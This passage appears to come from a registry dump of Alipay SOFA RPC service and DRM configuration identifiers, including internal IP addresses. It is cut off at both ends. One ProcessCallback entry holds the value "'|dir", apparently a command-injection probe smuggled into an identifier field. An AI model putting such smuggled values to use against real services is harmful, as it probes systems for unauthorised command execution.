T_INSTANCE_ID#@#SOFA","com.alipay.finscenewfin.common.service.facade.api.plan.CapitalPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.sac.PaloaltoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.pyxis.facade.ModelDefineOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingBusinessRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.admin.KnowledgeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.OrgCapitalAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.ActionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:pcreditcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-luoshutwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.apfasmng.common.service.facade.notification.NotificationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findefencecore.common.service.anna.facade.SLMFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.refundConsultNewParaSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tss.cptor.common.service.facade.CommonCptorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.service.facade.InsurePaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardPayeePartnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.rule.transfer.TransferRuleRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.multi.api.budget.GrstlMultiTypeBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.institution.InvestigatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.analysis.CrowdImageAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAssetShareFreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.CertFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.payrouter.common.service.facade.cache.BusinessFailResultCachedHandler:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiandataproc.common.service.api.DailyFileConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.FixedInvestmentContractInspectDRM.inspectSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.AnnouncementRemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.rt.api.RtQuestionAnswerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.TaskConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.WorkbenchTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.core.test.hag.HagTestRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcdatamerge.common.service.facade.service.IdTransferServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.KBAIdentityVerificationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.territory.TerritoryShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:middleware-override@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","pricemng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clearingcenter.facade.api.LiquidateRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbknowledgegraph@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.RefundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.metadata.KnowledgeQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcHangupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alideviceinfo.biz.openapi.iotpay.service.OfflinePayCodeService:1.0:offlinePayPosCodeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.config.MobileCodecSitecodeRouteruleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.client.facade.ComponentQueryCTairService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:yebbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.GroupRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiParamServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtUfrzProdWithStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ordercore.common.service.facade.OrderBatchOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskdataservice.common.service.facade.NameListCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.fluxexchange.FluxExchangeService:1.0:dcepAssetFluxExchangeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.common.service.ooda.facade.darwin.ExpTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.telecomfraud.instruction.facade.IAfscPunishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkoyzbroker.spi.publish.ConsistencyCheckFacade:1.0:CONSISTENCY_CHECK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsbatch.facade.AgdsBatchInterfaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.RouteExecuteService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:'|dir@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.friendsloan.api.FlctransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.riskmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.biz.fund.process.engine.FundModelCheckEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.7.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.SimpleService-36#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.iaassettrans.facade.fabs.api.trans.FinanceAssetTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.acctrans.facade.api.acctrans.AcctransAsyncTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.AttributeFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imif_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zarmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.blood.ZbdmTableBloodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.hbase.BufferTableResource.lindormTableBufferedConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reading.common.service.facade.game.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.SolutionTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.AttributeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.certify.service.facade.OpenCertifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acwareslifecore.common.service.facade.TemporaryOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.tradeexprod_history_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alcontract.common.service.facade.ContractRiskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.102.208.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.common.service.integration.drm.ZlcRzoneConfigDrm.zlcRzoneSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.137.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.spi.MessageSpi:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerSecurityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.SubscribeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.inner.service.process.ProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettleprod.facade.InterTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinBatchHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.216.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiServerlessFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.25.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ismonitor.common.service.facade.censor.NocQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileposprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.po.PoProjectGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.chargefront.core.service.config.ChargeFrontCommonDrm.goldenMainTransCheckSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.blackbox.BbRelationShipControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.CfpCardCardTransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:inchannel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.144.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.rzone.ArrangementQueryStdRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.facade.QuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.localCacheSizeRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.highvalue.api.HvtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.basic.DuplicateSubmitValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.rfm.inst.service.RfmInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.inspector.api.InspectorConfigurationService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ecoqltprod.common.service.facade.tinyapp.TinyappContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:intimateprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.creditorsright.CreditorsRightTransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CARDPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscharity.common.service.facade.PlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","kbproxy@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.69.243.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.ctuevent.EventConsumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.CampOrderCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.common.service.facade.TallyOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.c2c.eval.EvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetcenter.common.service.facade.api.query.ast.AssetQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcdisputecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OcOrderQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linketestapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csactive.common.service.facade.api.RepeatRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_DCHAIN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCREDITBILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zskynet.facade.spi.BizSolutionQueryFacade:1.0:sdchecker@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoFeedbackInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.safe.AftsSafeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEFAULT_UNIFORM_EVENT2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.aftscmd.core.paybox.platform.device.DeviceStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.YouKuBenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthUserFriendListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfpcenter:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.apm.facade.remark.RemarkServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.merge.TaskMergeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.prizepool.MerchantPrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.usertemplate.UserTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.navigation.NavigationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.BalanceUpdateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_GFSETTLE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantBankDrm.katongNotSupportedEncashOrgCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bstsolprod.instalment.facade.api.merchant.PlatformPidQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gffund.common.service.facade.api.LogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.PublicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.RouteConfigCheck:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.receipt4Issue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.emergencytask.EmergencyNotifyService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.keplergateway.KeplerJobManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_business_delete_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataCacheDRM.institutionQuerySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yqcore.common.service.ha3.api.Ha3OperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.service.impl.contentcheck.mock.MockCheckMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.creditBuyerCharge,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.AlipayRelationRecommendCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.PaymentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.biztask.facade.BizTaskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.config.managment.BackStageManagmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.useShopArByPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.service.geabase.GeabaseClientFactory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eco.smdd.service.api.tinyapp4c.order.OrderQuery4cService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.NotifyQueryFacade:1.0:uniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.encrypt.api.EncryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edubizsp.core.service.sequence.SeqNoRzoneGenerateService:1.0:seqNoRzoneGenerateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.bff.StuffDeliveryOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.QuotationInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.auto.AutoApplySpmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.api.SLSQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tscenter.biz.rpc.mini.MiniService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.bff.FundAdvisorProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opensupport.common.service.facade.partner.PartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.sendToCardMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.admin.AppInfoOperateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.cloudprovision.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.supportInstStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.core.service.reindeer.ChannelManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.zteslaDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.common.service.rest.meta.RestMetaStorageClusterService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.prodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.195.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:creditTemplateAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.managePlanCheckVoucher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudi